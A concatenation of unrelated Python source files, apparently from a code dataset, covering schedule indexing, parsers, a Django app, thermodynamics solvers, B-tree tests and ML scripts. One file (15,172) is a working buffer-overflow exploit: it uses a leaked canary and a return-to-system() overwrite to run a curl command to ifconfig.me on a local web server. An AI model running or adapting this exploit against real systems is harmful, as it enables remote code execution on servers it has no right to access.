c1.execute(query)
with open(fileName, "w") as export:
row = c1.fetchone()
while row is not None:
export.write(str(row) + "\n")
row = c1.fetchone()
c1.close()
# sort export file in ascending order
import subprocess
import shutil
subprocess.call(["sort", "--parallel=3", "-o", "temp", fileName])
shutil.move("temp", fileName)
with open(fileName, "r+") as export:
createWordVectors(export, countOfSentences)
createSentenceVectors()
createSentencePairs()
|
15,162 | d31722f4a31ba90395b10285e90bc2b99cee70e1 | # -*- coding: utf-8 -*-
from lxml import etree
import argparse
import os
import re
import sys
from reader import chunker
import languages
langs = re.compile('\{\{etyl.+?(?:lang=)?(\w+)\}\}', re.I)
def consolidate_iso(iso):
return languages.name2iso[languages.iso2name[iso]]
def parse_page(page):
'''
Returns a pair (word, source_languages)
e.g.,
('Burgundy', ['fr', 'hy', 'la', 'la', 'la'])
or,
('Burunika', [])
'''
tree = etree.fromstring(page)
word = tree.xpath('/page/title')[0].text
# if not word.startswith('Wiktionary:'):
codes = []
body = tree.xpath('/page/revision/text')[0].text
if body:
codes = langs.findall(body)
return word, codes
parser = argparse.ArgumentParser(description='Wiktionary parser')
parser.add_argument('--take', type=int)
opts = parser.parse_args()
corpora_path = os.environ['CORPORA']
wiktionary_xml = corpora_path + '/wiktionary/enwiktionary-20130503-pages-articles-multistream.xml'
with open(wiktionary_xml) as wiktionary_fp:
counter = 0
for page in chunker(wiktionary_fp, ' <page>\n', ' </page>\n'):
word, page_isos = parse_page(page)
# if not word.startswith('Wiktionary:'):
if len(page_isos) > 0:
# languages.iso2name will not contain iso mostly in weird, typo-ish cases
page_isos = [consolidate_iso(iso) for iso in page_isos if iso in languages.iso2name]
# page_languages = sorted(list(set(page_languages)))
line = '%s\t%s\n' % (word, ','.join(page_isos))
sys.stdout.write(line.encode('utf8'))
sys.stdout.flush()
counter += 1
if counter % 100 == 0:
sys.stderr.write('\r%7d' % counter)
sys.stderr.flush()
if opts.take and counter > opts.take:
break
|
15,163 | 90bc4dac85d52035dc619b042ef3d00296294932 | import SignIn
import Signup
from Handler import Handler
def valid_login_cookie(cookie):
username = cookie.split('|')[0]
return cookie == SignIn.make_secure(username) and Signup.User.get_user_by_name(username)
class Welcome(Handler):
page_title = "Welcome"
def get(self):
login_cookie = self.request.cookies.get("user", None)
if not login_cookie or not valid_login_cookie(login_cookie):
self.redirect("/signup")
else:
username = login_cookie.split('|')[0]
self.render("welcome.html", user=username)
|
15,164 | 13d2da65726c81d838a77b17c801a43814754bd8 | import os
import cv2
import numpy as np
from random import shuffle
from skimage import transform
from constants import random_transform_args
from constants import face_coverage
def get_transpose_axes(n):
if n % 2 == 0:
y_axes = list(range(1, n - 1, 2))
x_axes = list(range(0, n - 1, 2))
else:
y_axes = list(range(0, n - 1, 2))
x_axes = list(range(1, n - 1, 2))
return y_axes, x_axes, [n - 1]
def stack_images(images):
images_shape = np.array(images.shape)
new_axes = get_transpose_axes(len(images_shape))
new_shape = [np.prod(images_shape[x]) for x in new_axes]
return np.transpose(
images,
axes=np.concatenate(new_axes)
).reshape(new_shape)
def random_warp(image, coverage=face_coverage):
assert image.shape == (256, 256, 3)
range_ = np.linspace(128 - coverage // 2, 128 + coverage // 2, 5)
mapx = np.broadcast_to(range_, (5, 5))
mapy = mapx.T
mapx = mapx + np.random.normal(size=(5, 5), scale=5)
mapy = mapy + np.random.normal(size=(5, 5), scale=5)
interp_mapx = cv2.resize(mapx, (80, 80))[8:72, 8:72].astype('float32')
interp_mapy = cv2.resize(mapy, (80, 80))[8:72, 8:72].astype('float32')
warped_image = cv2.remap(image, interp_mapx, interp_mapy, cv2.INTER_LINEAR)
src_points = np.stack([mapx.ravel(), mapy.ravel()], axis=-1)
dst_points = np.mgrid[0:65:16, 0:65:16].T.reshape(-1, 2)
mat = transform.SimilarityTransform()
mat.estimate(src_points, dst_points)
target_image = cv2.warpAffine(image, mat.params[0:2], (64, 64))
return warped_image, target_image
def random_transform(image,
rotation_range,
zoom_range,
shift_range,
random_flip):
h, w = image.shape[0:2]
rotation = np.random.uniform(-rotation_range, rotation_range)
scale = np.random.uniform(1 - zoom_range, 1 + zoom_range)
tx = np.random.uniform(-shift_range, shift_range) * w
ty = np.random.uniform(-shift_range, shift_range) * h
mat = cv2.getRotationMatrix2D((w // 2, h // 2), rotation, scale)
mat[:, 2] += (tx, ty)
result = cv2.warpAffine(
image, mat, (w, h), borderMode=cv2.BORDER_REPLICATE)
if np.random.random() < random_flip:
result = result[:, ::-1]
return result
def read_image(img_path, random_transform_args=random_transform_args):
image = cv2.imread(img_path) / 255.0
image = cv2.resize(image, (256, 256))
image = random_transform(image, **random_transform_args)
warped_img, target_img = random_warp(image)
return warped_img, target_img
def minibatch(image_list, batchsize):
length = len(image_list)
epoch = i = 0
shuffle(image_list)
while True:
size = batchsize
if i + size > length:
shuffle(image_list)
i = 0
epoch += 1
images = np.float32([read_image(image_list[j])
for j in range(i, i + size)])
warped_img, target_img = images[:, 0, :, :, :], images[:, 1, :, :, :]
i += size
yield epoch, warped_img, target_img
def minibatchAB(image_list, batchsize):
batch = minibatch(image_list, batchsize)
for ep1, warped_img, target_img in batch:
yield ep1, warped_img, target_img
def get_image_paths(img_dir):
return [os.path.join(img_dir, x) for x in os.listdir(img_dir)]
|
15,165 | 306a08ebc719484c8a43af6a14304dbd1a8f9521 | #-*- encoding: utf-8 -*-
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponse
from django.template import RequestContext
from multa.controleUsuario.models import Usuario
from multa.controleUsuario.models import Multa
from multa.controleUsuario.forms import FormCadastro
from multa.controleUsuario.forms import FormCadastroMulta
def index(request):
return render_to_response('base.html', {})
def cadastro(request):
multa_lista = Multa.objects.all()
usuario_lista = Usuario.objects.all()
return render_to_response('cadastroUsuario.html', {'usuario_lista': usuario_lista, 'multa_lista': multa_lista})
def adiciona(request):
if request.method == "POST":
form = FormCadastro(request.POST, request.FILES)
if form.is_valid():
form.save()
return render_to_response("salvo.html", {})
else:
form = FormCadastro()
return render_to_response("UsuarioAdiciona.html", {'form': form},
context_instance=RequestContext(request))
def adicionaMulta(request):
if request.method =="POST":
form = FormCadastroMulta(request.POST, request.FILES)
if form.is_valid():
form.save()
return render_to_response("salvo.html", {})
else:
form = FormCadastroMulta()
return render_to_response("adicionaMulta.html", {'form': form},
context_instance=RequestContext(request))
def editarUsuario(request, nr_id):
usuarioID = get_object_or_404(Usuario, pk=nr_id)
if request.method == "POST":
form = FormCadastro(request.POST, request.FILES, instance=usuarioID)
if form.is_valid():
form.save()
return render_to_response("salvo.html", {})
else:
form = FormCadastro(instance=usuarioID)
return render_to_response("editarUsuario.html", {'form': form},
context_instance=RequestContext(request))
def editarMulta(request, nr_id):
multaID = get_object_or_404(Multa, pk = nr_id)
if request.method == "POST":
form = FormCadastroMulta(request.POST, request.FILES, instance=multaID)
if form.is_valid():
form.save()
return render_to_response("salvo.html", {})
else:
form = FormCadastroMulta(instance=multaID)
return render_to_response("editarMulta.html", {'form': form},
context_instance=RequestContext(request))
|
15,166 | 04ab4ac69071fa18bf94726989689284bf15f1ae | coin=("adzcoin", "auroracoin-qubit", "bitcoin", "bitcoin-cash", "bitcoin-gold", "dash", "digibyte-groestl",
"digibyte-qubit", "digibyte-skein", "electroneum", "ethereum", "ethereum-classic", "expanse", "feathercoin",
"gamecredits", "geocoin", "globalboosty", "groestlcoin", "litecoin","maxcoin", "monacoin","monero","musicoin",
"myriadcoin-groestl","myriadcoin-skein", "myriadcoin-yescrypt", "sexcoin", "siacoin", "startcoin", "verge-scrypt",
"vertcoin", "zcash", "zclassic", "zcoin", "zencash") |
15,167 | 516f36f7bd685cec34f425a49b8f3804f6745fb7 | # -*- coding: utf-8 -*-
"""
@author: lennin
Vista Base para heredar.
El objetivo es minimizar la programacion de la impresion de menus en cli
la vista que herede debe agregar una variable llamada menu
que debe ser un diccionario con el siguiente formato:
menu = {
<id de la opcion del menu> : ("<Nombre de la opcion>", <otro diccionario
del mismo formato o una funcion que resuelva>)
}
ejemplo:
menu = {
1: ("OPCION 1": {
1: ("SUBMENU 1.1" , {
1: ("ACCION 1.1.1", funcion1),
2: ("ACCION 1.1.2", funcion2)
}) }),
2 : ("OPCION 2": {
1: ("SUBMENU 2.1" , {
1: ("ACCION 2.1.1", funcion3),
2: ("ACCION 2.1.2", funcion4)
}),
2: ("SUBMENU 2.2" , {
1: ("ACCION 2.2.1", funcion5),
2: ("ACCION 2.2.2", funcion6)
}) ,
3: ("SALIR" , sys.exit)
})
}
NOTAS:
* Se debe evitar sobreescribir el metodo __init__ puesto que a partir de este
se genera las acciones para mostrar menus. En cualquier caso, si se necesita
sobreescribir el metodo __init__ debera llamarse al finalizar la funcion sobreescrita
con super.__init__().
* Por ningun motivo sobreescribir el metodo __print
"""
import sys
if sys.version[0]=='2':
input = raw_input
entrada = input
salir = sys.exit
from types import FunctionType as funct
class VistaBase:
menu = {}
def __init__(self):
self.__print()
def __print(self, __menu=None, __key=None):
if __menu is None:
self.__print(self.menu, __key)
elif __key is None:
for k in __menu:
print("[%d] %s"%(k,__menu[k][0]))
opt = int(input('Seleccione opcion: '))
if opt not in __menu:
print("Error en opcion digitada")
self.__print(__menu, __key)
else:
self.__print(__menu, opt)
else:
value = __menu[__key][1]
if type(value) is dict:
self.__print(value)
elif type(value) is funct:
value()
self.__print()
if __name__=="__main__":
def f1():
print("REALIZANDO OPERACIONES....")
def s():
sys.exit()
class EjemploVista(VistaBase):
menu = {
1: ("EJEMPLO 1", {
1: ("EJEMPLO SUB MENU 1", f1),
2: ("SALIR", s)
}),
2: ("SALIR", s)
}
EjemploVista()
|
15,168 | da7616c6806299f2f0542af6bb056f9b0e8275dc | from ..helpers import eos
from ..helpers import alfaFunctions
from ..helpers.eosHelpers import A_fun, B_fun, getCubicCoefficients, getMixFugacity,getMixFugacityCoef, dAdT_fun
from ..solvers.cubicSolver import cubic_solver
from ..helpers import temperatureCorrelations as tempCorr
from ..helpers import mixing_rules
from numpy import log, exp, sqrt,absolute, array,sum
from scipy.optimize import fsolve, newton, root
from scipy.integrate import quad
def solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals',diagram=False,properties=False,heat_capacities=None):
# Vectorization
tc = array(tc)
pc= array(pc)
acentric = array(acentric)
liq_compositions=array(liq_compositions)
vap_compositions = array(vap_compositions)
kij = array(kij)
# Method selection
eos_fun = eos.selector(method)
u,w,omega_a,omega_b,L = eos_fun()
# Alfa function selection
alfa_fun = alfaFunctions.selector(alfa_function)
alfa= alfa_fun(t,tc,acentric)
Ai = A_fun(t,p,tc,pc,acentric,omega_a,alfa)
Bi = B_fun(t,p,tc,pc,omega_b)
# Mixing rules
mixing_rule_used = mixing_rules.selector(mixing_rule)
A_liq,B_liq,A_i_liq,Aij_liq,dAdT_liq = mixing_rule_used(liq_compositions,tc,acentric,kij,Ai,Bi,alfa,alfa_fun,t)
A_vap,B_vap,A_i_vap,Aij_vap,dAdT_vap = mixing_rule_used(vap_compositions,tc,acentric,kij,Ai,Bi,alfa,alfa_fun,t)
coefficients_liq = getCubicCoefficients(A_liq,B_liq,u,w)
coefficients_vap = getCubicCoefficients(A_vap,B_vap,u,w)
z_liq= cubic_solver(coefficients_liq,diagram,B_liq)
z_vap = cubic_solver(coefficients_vap,diagram,B_vap)
z_liq = z_liq[0] if isinstance(z_liq,tuple) else z_liq
z_vap = z_vap[1] if isinstance(z_vap,tuple) else z_vap
liq_fugacity_coef = getMixFugacityCoef(z_liq,A_liq,B_liq,A_i_liq,Bi,L)
vap_fugacity_coef = getMixFugacityCoef(z_vap,A_vap,B_vap,A_i_vap,Bi,L)
if(properties):
liq_fugacity = getMixFugacity(z_liq,A_liq,B_liq,A_i_liq,B_liq,L,liq_compositions,p)
vap_fugacity = getMixFugacity(z_vap,A_vap,B_vap,A_i_vap,B_vap,L,vap_compositions,p)
heat_capacities = array(heat_capacities)
ideal_enthalpies = get_ideal_enthalpy(heat_capacities,t)
ideal_entropies = get_ideal_entropy(heat_capacities,t,p)
dAdt = dAdT_fun(t,p,tc,pc,acentric,omega_a,alfa_fun)
enthalpy_liq = get_real_enthalpy(ideal_enthalpies,t,z_liq,A_liq,dAdt,B_liq,L)
enthalpy_vap = get_real_enthalpy(ideal_enthalpies,t,z_vap,A_vap,dAdt,B_vap,L)
entropy_liq = get_real_entropy(ideal_entropies,z_liq,A_liq,dAdt,B_liq,L)
entropy_vap = get_real_entropy(ideal_entropies,z_vap,A_vap,dAdt,B_vap,L)
response = {
"liq_fugacity":liq_fugacity,
"vap_fugacity":vap_fugacity,
"enthalpy_liq":enthalpy_liq,
"enthalpy_vap":enthalpy_vap,
"entropy_liq":entropy_liq,
"entropy_vap":entropy_vap,
"z_liq":z_liq,
"z_vap":z_vap,
"liq_compositions":liq_compositions,
"vap_compositions":vap_compositions
}
return response
return (liq_fugacity_coef,vap_fugacity_coef)
def bubble_temperature(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_t=0.1,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sy = sum(Ki*liq_compositions)
E = log(Sy)
attempts=0
new_t=t
new_vap_compositions = vap_compositions
while(absolute(E) >= 1e-9):
if(attempts == 500):
return 'Problem can not be solved'
t0 = new_t + delta_t
liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t0,p,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
Sy0 = sum(Ki0*liq_compositions)
E0 = log(Sy0)
new_t = (new_t*t0*(E0-E))/(t0*E0-new_t*E)
Sy = sum(Ki*liq_compositions)
new_vap_compositions = (Ki*liq_compositions)/Sy
liq_fugacity_coef,vap_fugacity_coef = solve_eos(new_t,p,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sy = sum(Ki*liq_compositions)
E=log(Sy)
attempts +=1
return(new_t,p,liq_compositions,new_vap_compositions)
def bubble_pressure(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_p=0.001,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sy = sum(Ki*liq_compositions)
E = Sy -1
attempts=0
new_p=p
new_vap_compositions = vap_compositions
while(absolute(E) >= 1e-9):
if(attempts == 500):
return 'Problem can not be solved'
p0=new_p*(1+delta_p)
liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t,p0,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
Sy0 = sum(Ki0*liq_compositions)
E0=Sy0-1
new_p = (new_p*p0*(E0-E))/(p0*E0-new_p*E)
Sy = sum(Ki*liq_compositions)
new_vap_compositions = (Ki*liq_compositions)/Sy
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,new_p,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sy = sum(Ki*liq_compositions)
E = Sy -1
attempts +=1
return(t,new_p,liq_compositions,new_vap_compositions)
def dew_temperature(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_t=0.1,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sx = sum(vap_compositions/Ki)
E = log(Sx)
attempts=0
new_t=t
new_liq_compositions = liq_compositions
while(absolute(E) >= 1e-9):
if(attempts == 500):
return 'Problem can not be solved'
t0 = new_t + delta_t
liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t0,p,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
Sx0 = sum(vap_compositions/Ki0)
E0 = log(Sx0)
new_t = (new_t*t0*(E0-E))/(t0*E0-new_t*E)
Sx = sum(vap_compositions/Ki)
new_liq_compositions = vap_compositions/(Ki*Sx)
liq_fugacity_coef,vap_fugacity_coef = solve_eos(new_t,p,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sx = sum(vap_compositions/Ki)
E = log(Sx)
attempts +=1
return(new_t,p,new_liq_compositions,vap_compositions)
def dew_pressure(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_p=0.001,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sx = sum(vap_compositions/Ki)
E = Sx -1
attempts=0
new_p=p
new_liq_compositions = liq_compositions
while(absolute(E) >= 1e-9):
if(attempts == 500):
return 'Problem can not be solved'
p0=new_p*(1+delta_p)
liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t,p0,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
Sx0 = sum(vap_compositions/Ki0)
E0=Sx0-1
new_p = (new_p*p0*(E0-E))/(p0*E0-new_p*E)
Sx = sum(vap_compositions/Ki)
new_liq_compositions = vap_compositions/(Ki*Sx)
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,new_p,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
Sx = sum(vap_compositions/Ki)
E = Sx -1
attempts +=1
return(t,new_p,new_liq_compositions,vap_compositions)
def flash(t,p,tc,pc,acentric,feed_compositions,liq_compositions,vap_compositions,v_f,kij,delta_p=0.0001,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
tau=1
while(absolute(tau)> 1e-5):
liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
Ki = liq_fugacity_coef/vap_fugacity_coef
S = sum((feed_compositions*(Ki-1))/(1+(v_f*(Ki-1))))
S0 = sum((-feed_compositions*(Ki-1)**2)/(1+v_f*(Ki-1))**2)
v_f = v_f-(S/S0)
liq_compositions0 = feed_compositions/(1+v_f*(Ki-1))
Sx=sum(liq_compositions0)
liq_compositions = liq_compositions0/Sx
vap_compositions0=liq_compositions0*Ki
Sy=sum(vap_compositions0)
vap_compositions=vap_compositions0/Sy
tau=sum(absolute(liq_compositions*liq_fugacity_coef-vap_compositions*vap_fugacity_coef))
return (t,p,feed_compositions,liq_compositions,vap_compositions,v_f)
def get_ideal_enthalpy(heat_capacities,t):
ideal_enthalpies = []
for cp in heat_capacities:
number, constants = cp
heat_capacity_equation = tempCorr.selector(number)
enthalpy,_ = quad(heat_capacity_equation,298,t,args=(constants,))
ideal_enthalpies.append(enthalpy)
return array(ideal_enthalpies)
def get_ideal_entropy(heat_capacities,t,p):
R=8.314
ideal_entropies = []
for cp in heat_capacities:
number,constants = cp
heat_capacity_equation = lambda t,constants :tempCorr.selector(number)(t,constants)/t
I,_ = quad(heat_capacity_equation,298,t,args=(constants,))
entropy = I - R*log(p)
ideal_entropies.append(entropy)
return array(ideal_entropies)
def get_real_enthalpy(ideal_enthalpies,t,z,A,dAdt,B,L):
R=8.314
enthalpies = ideal_enthalpies + R*t*(z-1+((dAdt-A)/B)*L(z,B))
return enthalpies
def get_real_entropy(ideal_entropies,z,A,dAdt,B,L):
R=8.314
entropies = ideal_entropies + R*(log(z-B)+dAdt/B*L(z,B))
return entropies
|
15,169 | c75c77d5731d41f6ceac442470954406928e0986 | #!/bin/python3
import numpy as np
import random
import os
import matplotlib.pyplot as plt
from scipy.stats import norm
from copy import deepcopy
import tensorflow as tf
np.set_printoptions(precision=4, edgeitems=6, linewidth=100, suppress=True)
from vae import ConvVAE, reset_graph
DATA_DIR = '/N/u/mhaghir/Carbonate/CogIA_project/CIAIP/VAE/Data'
filelist = os.listdir(DATA_DIR)
filelist.sort()
filelist = filelist[195:]
data = np.load(DATA_DIR + '/' + filelist[1])
game_frames = data['obs']
game_frames = game_frames.astype(np.float32)/255.0
# frame = random.choice(frames).reshape(1, 64, 64, 3)
frame = game_frames[5].reshape(1, 64, 64, 3)
# fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (6, 6))
# ax.imshow(frame[0])
# fig.savefig('frame.pdf')
# plt.close()
z_size = 2
model_path_name = '/N/u/mhaghir/Carbonate/CogIA_project/CIAIP/VAE/vae'
vae = ConvVAE(z_size=z_size,
batch_size=1,
is_training=False,
reuse=False,
gpu_mode=False)
# vae.load_json(os.path.join(model_path_name, 'vae_self_10_zsize_2.json'))
batch_z = vae.encode(frame[:, 0:52, :])
# mu, logvar = vae.encode_mu_logvar(frame)
# fig, axs = plt.subplots(nrows = 8, ncols = 4, figsize = (14, 15))
# axs = axs.ravel()
# for i in range(32):
# # z_copy = deepcopy(batch_z)
# # z_copy[0, i] == 0
# z_copy = np.expand_dims(np.random.random_sample((2,)), 0)
# axs[i].imshow(np.squeeze(vae.decode(z_copy)))
# # axs[i].legend( 'dim_{}'.format(i), loc='lower right')
# # axs[i].set_ylim(0.8,1)
# fig.savefig('z_explore.pdf')
# plt.close()
# reconstruct = vae.decode(batch_z)
# fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (6, 6))
# ax.imshow(reconstruct[0])
# fig.savefig('rec_frame.pdf')
# plt.close()
# model_params, model_shapes, model_names = vae.get_model_params()
# for param in zip(model_snames, model_shapes):
# print(param[0], ': ', param[1])
# print('\n')
h, h1, h2, h3, h4, h5, h6, h7, h8, h9, y = vae.hidden(frame[:, 0:52, :])
print("h: ", np.shape(h))
print("h1: ", np.shape(h1))
print("h2: ", np.shape(h2))
print("h3: ", np.shape(h3))
print("h4: ", np.shape(h4))
print("h5: ", np.shape(h5))
print("h6: ", np.shape(h6))
print("h7: ", np.shape(h7))
print("h8: ", np.shape(h8))
print("h9: ", np.shape(h9))
print("y: ", np.shape(y))
|
15,170 | ba5d83903aa587a0e1b0e5bb7b6e40035185c551 | import sqlite3
from time import time
def PrepareIndex(db):
c = db.cursor()
for t in "I R days O F text_index".split():
try:
c.execute('drop table %s' % t)
except:
pass
try:
c.execute('drop index I_%s' % t)
except:
pass
#
# Create text index (sort of...)
#
c.execute('''
CREATE TABLE text_index AS
select semester,
code,
title,
replace(code, ' ', '') || ' ' || title || ' ' || room || ' ' || instructor || ' ' || schtype as T
from schedule
''')
#
# Create all intervals
#
start = time()
c.execute("""
CREATE TABLE IF NOT EXISTS I(
i integer not null primary key,
starthour integer,
startmin integer,
endhour integer,
endmin integer)
""")
i = 0
for starthour in range(8, 20):
for startmin in (0, 30):
endhour = starthour if startmin == 0 else starthour+1
endmin = 0 if startmin == 30 else 30
c.execute('insert into I values (?,?,?,?,?)',
(i, starthour, startmin, endhour, endmin))
i += 1
db.commit()
print("I: %.2f seconds" % (time() - start))
#
# Create all physical rooms in the north campus
#
start = time()
c.execute('''
create table if not exists R AS
select room, campus,
count (distinct substr(code, 1, 4)) as flex,
max(capacity) as capacity
from schedule
where (room not like 'Virtual%'
and room != 'TBA'
and room != '61%'
and campus like '%north%')
group by room, campus
''')
c.execute('''
create table if not exists days as
select distinct weekday
from schedule
where weekday in ('M', 'T', 'W', 'R', 'F')
''')
print("R: %.2f seconds" % (time() - start))
#
# Create all occupied intervals
#
def overlap(x0 , y0, x1, y1):
return "not (%(y0)s <= %(x1)s or %(y1)s <= %(x0)s)" % dict(
x0=x0, y0=y0, x1=x1, y1=y1)
start = time()
c.execute('''
create table if not exists O as
select code, room, weekday, i, semester
from schedule S join I
on %(overlap)s
''' % dict(overlap=overlap(
"S.starthour*60 + S.startmin",
"S.endhour *60 + S.endmin",
"I.starthour*60 + I.startmin",
"I.endhour *60 + I.endmin")))
c.execute("create index I_O on O(room, weekday, i)")
db.commit()
print("O: %.2f seconds" % (time() - start))
#
# Create all free intervals
#
start = time()
c.execute('''
create table if not exists F as
select T.semester, R.room, days.weekday, I.i, O.code
from (select distinct semester from schedule) T,
R,
days,
I
left join O
on T.semester = O.semester
and R.room = O.room
and days.weekday = O.weekday
and I.i = O.i
''')
print("F: %.2f seconds" % (time() - start))
db.commit()
if __name__ == '__main__':
import sys
dbname = sys.argv[1]
db = sqlite3.connect(dbname)
PrepareIndex(db)
db.close()
|
15,171 | ea756c99f83a9ffbac914c9cf312b32231382162 | import random
import pickle
import unittest
from btree import *
class BTreeTests(unittest.TestCase):
def test_additions(self):
bt = BTree(20)
l = list(range(2000))
for i, item in enumerate(l):
bt.insert(item)
self.assertEqual(list(bt), l[:i + 1])
def test_bulkloads(self):
bt = BTree.bulkload(list(range(2000)), 20)
self.assertEqual(list(bt), list(range(2000)))
def test_removals(self):
bt = BTree(20)
l = list(range(2000))
list(map(bt.insert, l))
rand = l[:]
random.shuffle(rand)
while l:
self.assertEqual(list(bt), l)
rem = rand.pop()
l.remove(rem)
bt.remove(rem)
self.assertEqual(list(bt), l)
def test_insert_regression(self):
bt = BTree.bulkload(list(range(2000)), 50)
for i in range(100000):
bt.insert(random.randrange(2000))
class BPlusTreeTests(unittest.TestCase):
@unittest.skip
def testSerialization(self):
bt = BPlusTree(20)
bt.insert(1, 'one')
bt.insert(1, 'uno')
bt.insert(1, 'raz')
bt.insert(2, 'two')
bt.insert(2, 'duo')
bt.insert(2, 'dva')
bt.insert(3, 'three')
bt.insert(3, 'tres')
bt.insert(3, 'tri')
ser = pickle.dumps(bt)
bt2 = pickle.loads(ser)
for v in bt2.items():
print(v)
@unittest.skip
def testMultipleAddition(self):
bt = BPlusTree(20)
bt.insert(1, 'one')
bt.insert(1, 'uno')
bt.insert(1, 'raz')
bt.insert(2, 'two')
bt.insert(2, 'duo')
bt.insert(2, 'dva')
bt.insert(3, 'three')
bt.insert(3, 'tres')
bt.insert(3, 'tri')
bt.remove(2)
for v in bt.getlist(2):
print(v)
def test_additions_sorted(self):
bt = BPlusTree(20)
l = list(range(2000))
for item in l:
bt.insert(item, str(item))
for item in l:
self.assertEqual(str(item), bt[item])
self.assertEqual(l, list(bt))
def test_additions_random(self):
bt = BPlusTree(20)
l = list(range(2000))
random.shuffle(l)
for item in l:
bt.insert(item, str(item))
for item in l:
self.assertEqual(str(item), bt[item])
self.assertEqual(list(range(2000)), list(bt))
def test_bulkload(self):
bt = BPlusTree.bulkload(list(zip(list(range(2000)), list(map(str, list(range(2000)))))), 20)
self.assertEqual(list(bt), list(range(2000)))
self.assertEqual(
list(bt.items()),
list(zip(list(range(2000)), list(map(str, list(range(2000)))))))
if __name__ == '__main__':
unittest.main()
|
15,172 | 6f25350b1f18fe2bbd2a1a6f5b6c6c2465ec73a0 | import socket
import time
import base64
from sys import argv
import struct
canary = struct.pack('<L', int(argv[1], base=16))
ret_addr = struct.pack('<L', int(argv[2], base=16) - int("0x2d437", base=16))
# chech_auth + 0x2d437 = system
string_pointer = struct.pack('<L', int(argv[3], base=16) - int("0x90", base=16))
# string_pointer = ebp - 0x94
body=""
tmp = "a" * 100 #total 100 chars
body+=str.encode(tmp)
body+=canary #write canary
tmp = "a" * 12 # go to return address
body+=str.encode(tmp)
body+=ret_addr # overide with system
tmp = "a" * 4 # cause of system call
body+=str.encode(tmp)
body+=string_pointer
body+="curl ifconfig.me > /tmp/aabb.log\x00"
# %27$p %28$p %30$p
s = socket.socket()
s.connect(('127.0.0.1',8000))
send="POST /ultimate.html HTTP/1.1\r\n"
send+="Host: localhost:8000\r\n"
send+="Authorization: Basic YWRtaW46eW91IHNoYWxsIG5vdCBwYXNz\r\n"
send+="Content-Type: application/octet-stream\r\n\r\n"
send+=body
s.send(send)
time.sleep(1)
#r = s.recv(2000)
#print r
|
15,173 | 478c3b9c9d374bdcf9b9ca6302aff42ba3cfe555 |
import numpy as np
import matplotlib.pyplot as plt
r = np.arange(0, 6.0, 0.01)
################################################
def function(r):
theta = 4 * np.pi * r
return theta
###################################################
ax = plt.subplot(111, polar=True)
ax.plot(function(r), r, color='r', linewidth=2)
ax.set_rmax(2.0)
ax.grid(True)
ax.set_title("A line plot on a polar axis", va='bottom')
plt.show()
|
15,174 | fb5b39f543a8fb442c7fef22abe66941e3b25385 | from mara_db import config, views, cli
MARA_CONFIG_MODULES = [config]
MARA_NAVIGATION_ENTRY_FNS = [views.navigation_entry]
MARA_ACL_RESOURCES = [views.acl_resource]
MARA_FLASK_BLUEPRINTS = [views.blueprint]
MARA_CLICK_COMMANDS = [cli.migrate]
|
15,175 | ada61061be2d7270b7b4107d04053f21859417df | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
